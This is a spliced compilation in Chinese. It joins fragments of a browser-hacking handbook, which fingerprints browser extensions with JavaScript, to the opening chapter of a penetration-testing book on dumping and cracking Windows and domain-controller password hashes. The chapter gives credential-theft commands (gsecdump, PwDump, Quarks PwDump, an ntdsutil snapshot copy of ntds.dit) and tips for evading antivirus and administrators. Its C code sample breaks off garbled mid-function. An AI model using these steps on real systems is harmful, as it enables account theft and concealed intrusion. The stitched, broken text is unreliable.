13 Facebook. (2013). Getting Started for Websites - Facebook developers . Retrieved December 15, 2013 from https://developers.facebook.com/docs/guides/web/ HTML5规范也提出了一个IFrame沙箱建议,而且已经被现代浏览器支持。
14 StopBadware. (2013). Firefox Website Warning | StopBadware . Retrieved December 15, 2013 from https://www.stopbadware.org/firefox 1.3.5 混入内容 所谓 混入内容 (mixed content)网站,是指某个来源使用HTTPS协议,然后又通过HTTP请求内容。
在任何安全攻防中,你都不大可能从头到尾一页不差地翻阅这本书,而是会跳着阅读,先看完前面的介绍性章节,然后再视情况跳到最相关的章节。
第6章 攻击浏览器 虽然这一本书都在讲如何攻击浏览器,如何绕过它的安全部署,但这一章只关注所谓的核心浏览器,换句话说,就是没有任何扩展和插件的浏览器。
24 Giovanni Cattani. (2013). Detecting Chrome Extensions in 2013 .Retrieved November 30, 2013 from http://gcattani.co.vu/2013/03/detecting-chrome-extensions-in-2013/ 25 Krzysztof Kotowicz. (2012). Chrome addons enumeration . Retrieved November 30, 2013 from http://koto.github.io/blog-kotowicz-net-examples/chrome-addons/enumerate.html 接下来几小节介绍检测扩展的几种方法。
7.2.1 使用HTTP首部采集指纹 有的扩展可能会稍微修改一点请求首部,而有的扩展则生怕别人不知道浏览器安装了它们,对请求首部进行重度定制。 为了采集扩展指纹,我们需要通过检测目标扩展,来确定请求首部是否被修改过。 为了看出修改,可以捕获安装扩展前后的请求首部加以比较。
在下面的FirePHP代码中,可以看到该扩展修改了User-Agent请求首部: httpChannel.setRequestHeader("User-Agent", httpChannel.getRequestHeader("User-Agent") + ' '+ "FirePHP/" + firephp.version, false); 这行代码让FirePHP扩展在User-Agent请求首部后面追加了FirePHP/<VERSIONNUMBER>,从而表明自己的可用性。 正如下面的请求首部所示,要发现这一点非常容易: GET / HTTP/1.1 Host: browserhacker.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0 FirePHP/0.7.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate 前面Firefox浏览器在请求中发送给Web服务器的HTTP首部被修改了。 User-Agent首部字符串后面有 FirePHP/0.7.1 。
如下所示,针对所有URL,都会在 document_start 期间加载onloadwff.js: "all_frames": true, "js": [ "onloadwff.js" ], "matches": [ "http://*/*", "https://*/*", "file:///*" ], "run_at": "document_start" 这里先忽略问题多多又很宽松的 file:///* 匹配模式,只考虑采集指纹。
最后,扩展会运行一个函数,修改渲染后页面的DOM,给它添加一个新的、空的script标签: <script id="hiddenlpsubmitdiv" style="display: none;"></script> 这个扩展也会在DOM底部嵌入JavaScript。
相关条件在修改DOM的代码之前: if(b != "acidtests.org" && a.getElementById("hiddenlpsubmitdiv") == null && a.forms.length > 0) { 这个 if 语句检测当前页面,确定不是acidtests.org,而且DOM中并不包含hiddenlpsubmitdiv脚本,同时至少要有一个HTML表单。 如果页面中包含表单,则修改DOM,我们可以通过以下JavaScript,来检测LastPass存在与否: var result = "Not in use or not installed"; var lpdiv = document.getElementById('hiddenlpsubmitdiv'); // 先检查div if (typeof(lpdiv) != 'undefined' && lpdiv != null) { result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv"; // 使用jQuery搜索脚本元素中的lastpast_iter } else if ($("script:contains(lastpass_iter)").length > 0) { result = "Detected LastPass through presence of the embedded <script> which includes references to lastpass_iter"; } else { if (document.getElementsByTagName("form").length == 0) { result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed"; } } 首先,JavaScript检测前面讨论的脚本元素。
基于清单文件版本1的谷歌Chrome扩展,允许访问扩展的所有文件,就是通过相应的URL来实现:chrome-extension:///path/to/file.txt。 因为所有扩展都有一个manifest.json文件,所以知道GUID后就可以请求下面的URL了: chrome-extension://abcdefghijklmnopqrstuvwxyz012345/manifest.json 不过那是以前了。
以下来自清单文件中的代码片段,就是这样一个被声明的数组的例子,其中将logo.png、menu.html和style.css标记为可访问: { { "name": "extensionName", "version": "versionString", "manifest_version": 2 }, "web_accessible_resources": [ "logo.png", "menu.html", "style.css" ] } 对这个虚构的扩展而言,可以通过以下URL访问logo.png资源: chrome-extension://abcdefghijklmnopqrstuvwxyz012345/logo.png 实际上,只要两个信息就可以采集目标扩展指纹了。
第二个就是 web_accessible_resources 数组中定义了什么资源(如果有的话)。 好在,大多数扩展都至少会在 web_accessible_resources 数组中声明一项资源。
这些工具会从Chrome Web Store下载并解压扩展,你可以使用它扫描manifest.json文件,并在此基础上构建你的Chrome扩展指纹采集数据库。 26 Krzysztof Kotowicz. (2013). XssChef . Retrieved November 30, 2013 from https://github.com/koto/xsschef/blob/master/tools/scrap.php 有了Chrome扩展指纹数据库,需要在勾连浏览器中运行一些代码,探测相应资源。 以前面的logo.png资源为例,可以生成以下代码 27 : 27 Giovanni Cattani. (2013). The evolution of Chrome extensions . Retrieved November 30, 2013 from http://blog.beefproject.com/2013/04/the-evolution-of-chrome-extensions.html var testScript = document.createElement("script"); testURL = "chrome-extension://abcdefghijklmnopqrstuvwxyz012345/logo.png"; testScript.setAttribute("onload", "alert('Extension Installed!')"); testScript.setAttribute("src", testURL); document.body.appendChild(testScript); 基于这段代码的模式,可以迭代扩展数据库,迅速采集目标扩展指纹。
Unknown 6.8 问题 (1) 为什么在采集浏览器指纹时,使用DOM属性比使用User-Agent首部更可靠? (2) 对一个存在的DOM属性进行两次取反操作,比如 !!window ,会得到什么结果? (3) 对一个 null 值两次取反(比如 !!null )会得到什么结果? (4) JavaScript加密的效果如何? (5) 为什么需要取得浏览器语言信息? (6) 浏览器的一些特有行为对采集其指纹有什么帮助? (7) 什么样的cookie设置可以确保JavaScript不能访问cookie,而且只能通过HTTPS发送cookie? (8) 在SSL认证中, Null 字符攻击的工作原理是什么? (9) Metasploit的正向shell与反向shell有什么区别? (10) BeEF与Metasploit之间怎么实现通信? 要查看问题答案,请访问本书网站 https://browserhacker.com/answers ,或者Wiley的网站 http://www.wiley.com/go/browserhackershandbook 。
Cover Section0001 版权信息 书名:黑客攻防:实战加密与解密 作者:陈小兵 排版:辛萌哒 出版社:电子工业出版社 出版时间:2016-11-01 ISBN:9787121299858 — · 版权所有 侵权必究 · — 未知 内容简介 本书从黑客攻防的专业角度,结合网络攻防中的实际案例,图文并茂地再现Web渗透涉及的密码获取与破解过程,是市面上唯一一本对密码获取与破解进行全面研究的图书。本书共分7章,由浅入深地介绍和分析了目前流行的Web渗透攻击中涉及的密码获取、密码破解方法和手段,并结合多年的网络安全实践经验给出了相对应的安全防范措施,对一些经典案例还给出了经验总结和技巧。本书最大的特色就是实用和实战性强,思维灵活,内容主要包括Windows操作系统密码的获取与破解、Linux操作系统密码的获取与破解、数据库密码的获取与破解、电子邮件密码的获取与破解、无线网络密码的获取与破解、App密码的获取与破解、各种应用软件的密码破解、破解WebShell口令、嗅探网络口令、自动获取远程终端口令等。 本书既可以作为政府、企业相关人员研究网络安全的参考资料,也可以作为大专院校学生学习渗透测试的教材。 未经许可,不得以任何方式复制或抄袭本书之部分或全部内容。 版权所有,侵权必究。
未知 前言 在出版《黑客攻防实战案例解析》、《Web渗透技术及实战案例解析》和《安全之路——Web渗透技术及实战案例解析(第2版)》后,我和安天365团队经过讨论,决定将技术进行细化,进行专题研究,编写一系列黑客攻防实战方面的图书。经过近一年的努力,终于将《黑客攻防:实战加密与解密》完成。 本书从Web渗透的专业角度系统探讨黑客安全攻防中涉及的密码获取与破解技术,内容尽可能贴近实战。攻击与防护是辩证统一的关系,掌握了攻击技术,也就掌握了相应的防护技术。密码是黑客渗透中最为关键的部分,进入VPN需要密码,进入邮箱需要密码,进入域控服务器也需要密码。在渗透进服务器后,如何尽可能多地搜集和获取密码,是黑客获得更多权限的关键。 本书以Web渗透攻击与防御为主线,主要通过典型的案例来讲解密码的保护和破解技术。在每一个案例中,除了技术原理外,还对技术要点进行了总结和提炼。掌握和理解这些技术后,读者在遇到类似的场景时可以自己进行操作。本书采用最为通俗易懂的图文解说方式,按照书中的步骤即可还原攻防情景。通过阅读本书,初学者可以很快掌握Web攻防的流程、最新的技术和方法,有经验的读者可以在技术上更上一层楼,让攻防技术在理论和实践中更加系统化。 本书共分7章,由浅入深,依照Web攻防密码保护与获取的技术特点安排内容,每一节都是一个具体技术的典型应用,同时结合案例给予讲解,并给出一些经验总结。本书主要内容安排如下。 第1章 Windows操作系统密码的获取与破解 介绍目前黑客攻防过程中如何获取Windows操作系统的密码,如何使用LC5、Ophcrack、Hashcat等工具对获取系统密码Hash值进行快速破解,以及如何安全设置操作系统的密码和如何检查系统是否存在克隆账号等。 第2章 Linux操作系统密码的获取与破解 介绍Linux操作系统root账号和密码的获取与破解,使用fakesu记录root用户密码,Hydra暴力破解密码,读取Linux保存的密码等。 第3章 数据库密码的获取与破解 介绍常见的数据库加密方式,破解Access密码,破解MySQL数据库密码,通过网页文件获取数据库账号和口令,扫描获取SQL Server肉机,通过sa权限、MySQL root提权等。 第4章 电子邮件密码的获取与破解 电子邮箱是存储私密和敏感信息的重要位置。本章主要介绍如何快速获取浏览器中保存的邮箱和网站等的密码,如何获取Foxmail等软件保存的密码,以及如何扫描和攻击邮箱口令等,并给出了相应的防范建议。 第5章 无线网络密码的获取与破解 介绍如何使用CDlinux无线破解系统破解无线网络的密码,如何获取系统保存的无线网络密码,以及如何利用公共无线网络密码渗透并获取他人的邮箱口令等。 第6章 App密码的获取与破解 本章介绍如何对App程序进行反编译并获取程序中的密码等信息,同时对手机木马反编译、手机锁等技术进行了探讨。 第7章 其他密码的获取与破解 本章主要介绍pcAnywhere、VNC等账号和口令的破解,讨论Discuz!论坛密码记录及安全验证问题暴力破解、一句话密码破解获取网站WebShell,以及使用Burp Suite破解WebShell密码、手工检测黑客工具“中国菜刀”是否包含后门等。 虽然本书内容已经比较丰富和完整,但仍然无法涵盖所有的黑客攻防技术。技术的探索没有止境,更多的工具和方法,读者可以在日常学习和工作中去探索和发现。 资源下载 笔者在书中提到的所有相关资源可以到安天365网站(http://www.antian365.com)下载。特别是作者在多年工作中收集的渗透工具包,也在安天365网站免费提供下载。 特别声明 本书的目的绝不是为那些怀有不良动机的人提供支持,也不承担因为技术被滥用所产生的连带责任。本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全问题带来的经济损失。 由于作者水平有限,加之时间仓促,书中疏漏之处在所难免,恳请广大读者批评指正。 反馈与提问 读者在阅读本书过程中遇到任何问题或者有任何意见,都可以直接发电子邮件至antian365@gmail.com进行反馈。 读者也可以加入Web安全图书交流QQ群(436519159)进行交流。 致谢 参加本书编写工作的有陈小兵、刘晨、黄小波、韦亚奇、邓火英、刘漩、庞香平、武师、陈尚茂、邱永永、潘喆、孙立伟。 感谢电子工业出版社对本书的大力支持,尤其是潘昕编辑为本书出版所做的大量工作。感谢美工对本书进行的精美设计。 借此机会,还要感谢多年来在信息安全领域给我教诲的所有良师益友,感谢众多热心网友对本书的支持。 最后要感谢我的家人,是他们的支持和鼓励使本书得以顺利完成。 本书集中了安全365团队众多“小伙伴”的智慧。我们是一个低调潜心研究技术的团队,我衷心地向团队的所有成员表示感谢,感谢雨人、Cold、imiyoo、cnbird、pt007、Mickey、Xnet、fido、指尖的秘密、Leoda、pt007、Mickey、YIXIN、终隐、fivestars、暖色调の微笑、幻想弦乐、Unsafe、雄究究、gh0stbo、人海孤鸿、LCCL等,是你们给了我力量,给了我信念。 作者 2016年3月于北京
未知 第1章 Windows操作系统密码的获取与破解 Windows操作系统是目前世界上最为流行的、使用最为广泛的操作系统之一,由于操作简单、实用、方便等特点,深受个人计算机用户喜爱。也正因如此,Windows是最易受到攻击的操作系统,入侵者为了长期控制Windows个人计算机和服务器,除了安装木马程序外,还必须获取操作系统本身的账号和密码。所以,Windows系统密码的获取与破解是攻防的必备基础,是后期继续渗透的前提和关键,掌握Windows操作系统密码Hash的获取和破解至关重要。 本章着重介绍Windows操作系统如何通过GetHashes、gsecdump等工具快速获取密码Hash值并破解其密码,同时对扫描3389口令、自动获取3389口令、安全设置操作系统密码、检查系统账号是否被克隆等内容进行了介绍。 本章主要内容 使用GetHashes获取Windows系统密码 使用gsecdump获取Windows系统密码 使用Quarks PwDump获取域控密码 使用PwDump获取系统账号和密码 使用SAMInside获取及破解Windows系统密码 Windows Server 2003域控服务器用户账号和密码的获取 使用Ophcrack破解系统Hash密码 使用oclHashcat破解Windows系统账号和密码 使用L0phtCrack破解Windows和Linux的密码 通过hive文件获取系统密码Hash 使用Fast RDP Brute破解3389口令 Windows口令扫描攻击 使用WinlogonHack获取系统密码 检查计算机账号克隆情况 安全设置操作系统的密码
未知 1.1 使用GetHashes获取Windows系统密码 对入侵者来说,获取Windows口令是整个攻击过程中至关重要的一环,拥有用户的口令将使内网渗透和守控更加容易。 Windows系统中的Hash密码值主要由LM-hash值和NTLM-hash值两部分构成,一旦入侵者获取了系统的Hash值,通过LC5及彩虹表等破解工具就可以很快获取系统的密码。 本节主要探讨如何使用GetHashes工具获取系统的Hash值,并对Hash值的生成原理等知识进行讲解,最后介绍了一些有关Hash破解方面的技巧。
1.Hash的定义 Hash,一般翻译为“散列”,也有直接音译为“哈希”的,就是把任意长度的输入(又叫做预映射,Pre-Image)通过散列算法变换成固定长度的输出,该输出就是散列值。
这种转换是一种压缩映射,也就是散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,故不可能从散列值来唯一确定输入值。
简单地说,Hash就是一种将任意长度的消息压缩到某一固定长度的消息摘要函数。 2.Hash的应用 Hash主要用于信息安全领域的加密算法,它把一些不同长度的信息转化成杂乱的128位编码,这种编码叫做Hash值。 可以说,Hash就是找到数据内容和数据存放地址之间的映射关系。
(1)文件校验 我们比较熟悉的校验算法有奇偶校验和CRC校验,这两种校验并没有抗数据篡改的能力,它们在一定程度上能检测并纠正数据传输中的信道误码,但不能防止对数据的恶意破坏。
MD5 Hash算法的“数字指纹”特性,使它成为目前应用最广泛的一种文件完整性校验和(Checksum)算法,不少UNIX系统提供了计算MD5 Checksum的命令。
1.1.2 Windows的Hash密码值 下面我们讨论一下Windows的Hash密码值。 1.Windows系统的Hash密码格式 Windows系统的Hash密码格式如下。 用户名称:RID:LM-hash值:NT-hash值 Windows系统的Hash密码示例如下。 Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA 724774CE6CC::: 用户名:Administrator RID:500 LM-hash值:C8825DB10F2590EAAAD3B435B51404EE NT-hash值:683020925C5D8569C23AA724774CE6CC 2.Windows下LM-hash值的生成原理 假设明文口令是“Welcome”,首先全部转换成大写,即“WELCOME”,再将该大写字符串转换成二进制串“57454C434F4D4500000000000000”。
#include <stdio.h> #include <stdlib.h> #include <string.h> /* * 读取形如“AABBCCDDEEFF”的16进制数字串,由主调者进行形参的边界检查 */ static void readhexstring ( const unsigned char *src, unsigned char *dst, unsigned int len ) { unsigned int i; unsigned char str[3]; str[2] = '\0'; for ( i = 0; i < len; i++ ) { str[0] = src[ i * 2 ]; str[1] = src[ i * 2 + 1 ]; dst[i] = ( unsigned char )strtoul( str, NULL, 16 ); } return; } /* end of readhexstring */ /* * from The Samba Team's source/libsmb/smbdes.c */ static void str_to_key ( const unsigned char *str, unsigned char *key ) { unsigned int i; key[0] = str[0] >> 1; key[1] = ( ( str[0] &amp; 0x01 ) << 6 ) | ( str[1] >> 2 ); key[2] = ( ( str[1] &amp; 0x03 ) << 5 ) | ( str[2] >> 3 ); key[3] = ( ( str[2] &amp; 0x07 ) << 4 ) | ( str[3] >> 4 ); key[4] = ( ( str[3] &amp; 0x0F ) << 3 ) | ( str[4] >> 5 ); key[5] = ( ( str[4] &amp; 0x1F ) << 2 ) | ( str[5] >> 6 ); key[6] = ( ( str[5] &amp; 0x3F ) << 1 ) | ( str[6] >> 7 ); key[7] = str[6] &amp; 0x7F; for ( i = 0; i < 8; i++ ) { key[i] = ( key[i] << 1 ); } return; } /* end of str_to_key */ int main ( int argc, char * argv[] ) { unsigned int i; unsigned char buf_0[21]; unsigned char buf_1[24]; if ( argc != 2 ) { fprintf( stderr, "Usage: %s <hexadecimal string>\n", argv[0] ); return( EXIT_FAILURE ); } memset( buf_0, 0, sizeof( buf_0 ) ); memset( buf_1, 0, sizeof( buf_1 ) ); i = strlen( argv[1] ) / 2; readhexstring( argv[1], buf_0, i ); for ( i = 0; i < s { fprintf( stderr } fprintf( stderr, " str_to_key( buf_0, str_to_key( buf_0 str_to_key( buf_0 for ( i = 0; i < s { fprintf( stderr } fprintf( stderr, " return( EXIT_SUCCE } /* end of main */ 将这2组8字节数据作为DESKey对魔术字符串“KGS!@#$%”进行标准DES加密。
KGS!@#$%→4B47532140232425 56A25288347A348A→对4B47532140232425进行标准DES加密→C23413A8A1E7665F 0000000000000000→4B47532140232425进行标准DES加密→AAD3B435B51404EE将加密后的两组数据简单拼接,LM-hash为C23413A8A1E7665FAAD3B435B51404EE。
3.Windows下NTLM-hash值的生成原理 IBM设计的LM-hash算法存在几个弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,NTLM-hash应运而生。
123456→310032003300340035003600 从ASCII串转换成Unicode串时使用LITTLE-ENDIAN,微软在设计SMB协议时就没有考虑BIG-ENDIAN,ntoh*()、hton*() 函数不宜用在SMB报文解码中。
0x80之前的标准ASCII码转换成Unicode码,就是简单地从“0x??”变成“0x00??”。 此类标准ASCII串按LITTLE-ENDIAN转换成Unicode串,就是简单地在原有数据的每个字节之后添加“0x00”。
310032003300340035003600→进行标准MD4单向Hash→32ED87BDB5FDC5E9CBA88547376818D4 得到的NTLM-hash为32ED87BDB5FDC5E9CBA88547376818D4。
与LM-hash算法相比,明文口令对大小写敏感,无法根据NTLM-hash判断原始明文口令是否小于8字节,且摆脱了魔术字符串“KGS!@#$%”。
GetHashes <SAM registry file> [System key file] Or GetHashes $Local 根据个人爱好,可以将GetHashes软件更名为其他名称,在后面的案例中就将其命名为“getpw”。 2.使用GetHashes获取系统Hash值实例 将“GetHashes”更名为“getpw”,将其复制到欲获取Hash密码值的系统盘中,然后执行“getpw $local”命令,如图1-1所示,顺利获取其Hash密码值。
依次单击“文本”→“保存为”选项,将结果保存为一个新文件,使用UltraEdit编辑器进行编辑,仅保存Hash密码值部分,然后使用LC5导入Hash密码值即可破解系统的密码。 图1-1 获取系统Hash值 注意 (1)使用GetHashes获取系统的Hash密码值时,必须要在System权限下,也就是在反弹Shell或者Telnet下。
图1-2 许多杀毒软件已经将GetHashes作为病毒处理 (3)InsidePro公司在其网站上还提供了一个Hash产生器,通过输入一些参数值就能够生成经过某种加密算法处理的口令密码值,如图1-3所示,有兴趣的读者可以尝试。
图1-3 Hash生成器 (4)Hash密码值在线查询。 在http://hash.insidepro.com/网站还可以在线查询Hash密码值的原始明文口令,如图1-4所示。 将经过MD5加密的Hash值输入后,单击“Search”按钮,如果数据库中存在该值的计算结果,就会在该页面给出。
图1-4 在线破解Hash密码值 1.1.4 使用GetHashes获取系统Hash值的技巧 使用GetHashes获取系统的Hash值,一般是在获得了系统的部分或者全部控制权限之后,通常是在新的漏洞利用工具发布之后。
例如,当系统中存在MS08067漏洞时,可以使用MS08067漏洞利用工具获得存在此漏洞的计算机的一个反弹Shell,然后将GetHashes软件上传到系统中,执行“GetHashes $Local”命令。
02 查看系统版本,以及系统是否开启了3389远程终端。 如果未开启3389终端,判断可否直接开启3389终端。 如果可以利用3389终端,则直接添加一个具有管理员权限的用户,然后以该用户的身份登录系统。
未知 1.2 使用gsecdump获取Windows系统密码 gsecdump是Windows环境下获取密码的主要工具,其功能强于GetHashes,目前已经被定义为病毒,常见的病毒名有HackTool.FFC(AVG)、HackTool.Win32.Agent.ym(Kaspersky)、HTool-GSECDump(McAfee)、W32/Hacktool.AY(Norman)、Trojan.Moo(Symantec)、HKTL_AGENT(Trend Micro)。gsecdump的主要特点是在某些情况下能够获取域控密码,是不可多得的密码获取工具软件。 1.2.1 下载和使用gsecdump gsecdump目前的版本为2.0b5,由于其使用的广泛性,因此被Google Chrome及众多杀毒软件定义为病毒,其官方网站已经不提供下载地址,感兴趣的读者可以发送电子邮件至info@truesec.co索取。 1.2.2 gsecdump参数 运行gsecdump,如图1-5所示,默认显示帮助信息,也可以使用“gsecdump -h”命令获取帮助信息,其参数含义如下。 -h:显示帮助信息。 -a:获取所有密码信息。 -s:从SAM和域控中获取Hash值。 -l:获取LSA信息,用处不大。 -u:获取活动的登录Hash值,也即当前登录用户的Hash值。 -w:获取无线密码。 -S:强制评估版本为系统版本。 图1-5 gsecdump的运行参数信息 1.2.3 使用gsecdump获取系统密码 一般使用“gsecdump -a”命令获取所有用户的密码Hash值,如图1-6所示。也可以使用“gsecdump -u”命令获取当前登录用户的Hash值。 图1-6 获取系统所有用户的Hash值
未知 1.3 使用Quarks PwDump获取域控密码 Quarks PwDump是Quarkslab出品的一款开源用户密码提取工具,目前最新版本为0.2b,其完整源代码可以从https://github.com/quarkslab/quarkspwdump获取,支持Windows XP/2003/Vista/7/2008且相当稳定。Quarks PwDump可以抓取Windows平台上多种类型的用户凭据,包括本地账户、域账户、缓存的域账户和Bitlocker。开发这个工具的目的是同时抓取所有类型的Hash和Bitlocker信息。 该工具源代码下载地址为https://codeload.github.com/quarkslab/quarkspwdump/zip/ master,目前可以导出以下信息。 Local accounts NT/LM hashes + history:本机NT/LM Hash+历史登录记录。 Domain accounts NT/LM hashes + history:域中的NT/LM Hash +历史登录记录。 Cached domain password:缓存中的域管理密码。 Bitlocker recovery information (recovery passwords & key packages):用Bitlocker恢复后遗留的信息。 1.3.1 使用Quarks PwDump获取本地账号的Hash值 Quarks PwDump必须在DOS命令提示符下运行。运行QuarksPwDumpv0.2b.exe,如图1-7所示,默认显示帮助信息,其参数含义如下。 图1-7 使用Quarks PwDump获取本地账号的Hash值 -dhl:导出本地Hash值。 -dhdc:导出内存中的域控Hash值。 -dhd:导出域控Hash值(必须指定NTDS文件)。 -db:导出Bitlocker信息(必须指定NTDS文件)。 -nt:导出NTDS文件。 -hist:导出历史信息,可选项。 -t:导出类型,可选项,默认导出John类型。 -o:导出文件到本地。 1.3.2 使用Quarks PwDump导出账号实例 执行命令“QuarksPwDumpv0.2b.exe -dhl -o 1.txt”,将导出本地Hash值到当前目录下的1.txt文件。执行该命令会显示导出账号的数量,如图1-8所示,有3个账号的信息被导出,打开1.txt文件可以看到导出Hash值的具体账号和值。 图1-8 导出本地账号信息 1.3.3 配合使用NTDSutil导出域控密码 NTDSutil是一个为Active Directory提供管理设施的命令行工具。可以使用NTDSutil执行Active Directory的数据库维护工作,管理和控制单个主机的操作,创建应用程序目录分区,以及删除因未使用Active Directory安装向导(DCPromo.exe)而成功降级的域控制器留下的元数据。NTDSutil还可以用来获取域控数据库文件ntds.dit,具体命令如下。 创建快照。 ntdsutil snapshot "activate instance ntds" create quit quit NTDSutil加载活动目录的快照。{GUID}是动态获取的,如图1-9所示。 ntdsutil snapshot "mount {GUID}" quit quit 图1-9 导出快照文件 复制快照至本地磁盘。 copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit 卸载快照。 ntdsutil snapshot "unmount {GUID}" quit quit 删除快照。 ntdsutil snapshot "delete {GUID}" quit quit 使用命令“QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit”,将导出的ntds.dit文件中的Hash值全部导出,示例如下。 tdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit 快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已挂接为 C:\$SNAP_201212082315_ VOLUM EC$\ copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit ntdsutil snapshot "unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit ntdsutil snapshot "delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit 说明 获取Hash值最好在同一台服务器上执行,也就是说,将QuarksPwDump.exe直接放在导出ntds.dit文件的服务器上执行导出命令。如果仅将ntds.dit复制后下载到本地,可能会出现无法读取的错误。网上出现过一个ntds.dit密码快速提取工具NTDSDump,读者可以自己进行测试。如果想下载ntds.dit到本地进行恢复,还需要执行“reg save hklm\system system.hive”命令,将system.hive和ntds.dit全部复制到本地进行域控密码的获取。
未知 1.4 使用PwDump获取系统账号和密码 在网络攻击中,通过一些溢出程序成功溢出被攻击的计算机后,最重要的一个步骤就是获取该计算机中的用户账号和密码。特别是在成功控制服务器以后,获取系统中的账号和密码更是入侵者的必由之路。 通过使用计算机中用户原本的账号和密码登录3389终端,优于在系统中增加或者克隆账号。在系统中增加或者克隆账号容易被发现,进而导致被控计算机丢失。获取系统账号和密码的方法很多,本节使用比较流行的PwDump和LSASecretsView两款软件来获取系统中的账号和密码。 1.4.1 上传文件到欲获取密码的计算机 PwDump 4.02中有两个文件,一个是Pwd4.dll,另一个是Pwdump4.exe。在早期版本中,其DLL文件为lsaext.dll。 将这两个文件上传到欲获取账号和密码的计算机的系统目录下。 1.4.2 在Shell中执行获取密码的命令 本案例通过Radmin的Telnet来执行命令。 在系统根目录中执行“pwd4 /l /o:*.*.*.82.sam”命令,将系统中的账号和口令信息导出到“*.*.*.82.sam”文件中。导出成功后,会给出一些提示信息,如操作系统版本及用户数量等,如图1-10所示。然后,将其SAM文件传回本地计算机。 图1-10 执行获取密码的命令 说明 (1)在本例中,直接将Pwdump4.exe的名称更改为“pwd4.exe”,是为了在操作中减少输入的内容。 (2)“pwd4”后面的参数“/l”表示导出到本地,“/o:filename”表示输出到filename文件。 1.4.3 通过LC5导入SAM文件 通过PwDump4获取的是系统账号的Hash值,需要通过一些工具软件进行破解,从而获取其账号所对应的密码。 运行LC5,新建一个Session,然后在“Session”菜单或者图标中选择“Import”选项,在“Import”窗口的“Import from file”区域选中“From PWDUMP file”单选项,然后选择刚才导出的SAM文件,如图1-11所示。 图1-11 将SAM文件导入LC5 1.4.4 破解系统账号和密码 成功导入SAM文件后,会在LC5中显示“Domain”、“User Name”、“LM Password”、“Password”等信息,如图1-12所示。在该界面中,如果“LM Password”和“Password”列显示为“empty”,表示该账号为空或者使用PWDump未能导出其Hash值。在“User Name”列中,如果用户名以“IUSR_”、“IWAM_”开头,以及用户名为TsInternetUser、SQLDebugger的账号,均为系统账号,表示其密码是随机生成的,可以将其删除。 图1-12 需要破解的系统账号 1.4.5 破解结果 删除一些系统中无用的账号,单击“Session”菜单中的“Begin Audit”命令,或者单击工具栏上的绿色三角形按钮,开始破解密码。LC5破解成功后,会显密码信息,如图1-13所示。 图1-13 破解账号成功 说明 由于杀毒软件或者防火墙等系统的安全防御,使用PwDump 4.02及以前版本有可能无法正常导出系统账号及其Hash值。有时在执行命令后会出现长时间的无反应现象,如图1-14所示,这种现象表明无法通过Pw Dump导出系统账号和密码。 图1-14 导出系统账号和密码失败 对于导出系统账号和密码失败的情况,有两种处理方式:一种是使用其他软件;另一种是停用系统中的安全防护软件,再次使用PwDump导出系统账号和密码。在本案例中推荐使用LSASecretsView获取系统默认的密码。将LSASecretsView软件上传到欲获取账号和口令的计算机中,通过Radmin客户端或者其他方式,在桌面直接运行LSASecretsView,其显示结果中的“DefaultPassword”即为系统默认的管理员账号密码。 在本例中,密码为“48610”,如图1-15所示。通过LSASecretsView获取的密码是系统未更改的默认密码,对更改后的系统密码无能为力。 图1-15 通过LSASecretsView获取系统密码 注意 使用LSASecretsView获取系统的密码需要在GUI模式下进行。不过,LSASecretsView可以直接读出系统的默认密码,因此,使用该软件获取肉机的密码时操作一定要迅速,获取密码后立即删除该软件并退出桌面,以免被用户或者管理员发现。
未知 1.5 使用SAMInside获取及破解Windows系统密码 在通过SQL注入等方式获取网站的WebShell后,就要利用系统的各种漏洞进行提权,提权成功后通过远程终端进入系统。此时,为了长期控制或者进一步渗透网络,就需要获取系统正常用户的密码。 获取系统密码Hash值的软件很多,本节主要介绍如何使用SAMInside获取系统的Hash值,以及如何结合彩虹表快速破解系统用户的密码。 1.5.1 下载和使用SAMInside SAMInside的官方下载地址为http://www.insidepro.com/download/saminside.zip。目前的最新版本为SAMInside 2.7.0.2,该版本中不再提供GetHashes工具(官方提供的是试用版,有些高级功能不能使用),但并不影响获取系统密码Hash值。SAMInside可以获取Windows 2008 Server及以下版本操作系统的用户密码Hash值。在获取这些Hash值后,可以通过彩虹表或者字典等进行破解,进而获取系统的密码。SAMInside不需要安装,将下载的文件解压缩到本地磁盘即可使用。 1.5.2 使用Scheduler导入本地用户的Hash值 直接运行SAMInside,如图1-16所示,单击第3个图标,然后选择“Import Local Users via Scheduler”选项,将本地用户的Hash值导出。虽然SAMInside还提供了从LSASS导出本地用户的机制,但该方法在一些操作系统中容易出错。 图1-16 使用Scheduler导入本地用户的Hash值 1.5.3 查看导入的Hash值 使用SAMInside导入本地用户的Hash值,必须具有管理员权限。在有些情况下,管理员会对磁盘进行权限限制,这个时候需要为SAMInside授权才能获取系统用户的Hash值。 如图1-17所示,一共获取了4个用户的Hash值,并显示了每个值的User、RID、LM-password、NT-password、LM-hash、NT-hash、Description信息。如果LM-password和NT-password显示为“Disabled”,表示该账户处于禁用状态。对超过14位的密码,在LM-password中会以全0显示。在旧版本的SAMInside中,以“AA3D”开头显示的密码也表示其位数超过14位,如“simeon:1005:AAD3B435B51404EEAAD3B435B51404EE: 5E9C2FAAE669F5D06F33014E33AC2CFC:::”的密码就超过了14位。 图1-17 查看导入的Hash值 1.5.4 导出系统用户的Hash值 依次单击“File”→“Export Users to PWDUMP File”选项,将获取系统用户的密码Hash值导出为一个文件,其导出文件的内容如图1-18所示。然后,将该文件导入Ophcrack中进行破解。 